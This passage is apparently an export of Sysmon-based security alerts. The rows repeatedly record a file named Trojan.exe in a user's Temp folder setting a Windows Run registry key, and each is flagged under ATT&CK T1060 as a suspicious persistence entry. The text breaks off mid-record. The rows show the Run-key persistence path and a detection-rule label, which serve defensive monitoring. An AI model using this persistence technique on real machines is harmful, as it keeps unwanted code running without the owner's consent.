HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:24.836634800Z"",""eventRecordID"":""1489"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:24.832\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:24.832"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:36.967",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:23.815 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:23.817359000Z"",""eventRecordID"":""1487"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:23.815\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:23.815"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:36.957",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:22.799 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:22.817621700Z"",""eventRecordID"":""1485"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:22.799\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:22.799"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:36.834",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:21.783 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:21.785633200Z"",""eventRecordID"":""1484"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:21.783\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:21.783"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:33.928",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:20.768 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:20.769788300Z"",""eventRecordID"":""1483"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:20.768\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:20.768"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:32.881",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:19.752 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:19.760592900Z"",""eventRecordID"":""1482"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:19.752\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:19.752"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:31.849",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:18.736 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:18.740224000Z"",""eventRecordID"":""1480"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:18.736\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:18.736"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:30.852",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:17.721 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:17.734902400Z"",""eventRecordID"":""1479"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:17.721\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:17.721"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:29.815",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:16.705 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:16.707580200Z"",""eventRecordID"":""1477"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:16.705\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:16.705"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:27.867",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:15.689 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:15.693999700Z"",""eventRecordID"":""1471"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:15.689\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:15.689"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:27.824",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:14.674 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:14.695449900Z"",""eventRecordID"":""1469"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:14.674\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:14.674"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:26.959",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:13.643 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 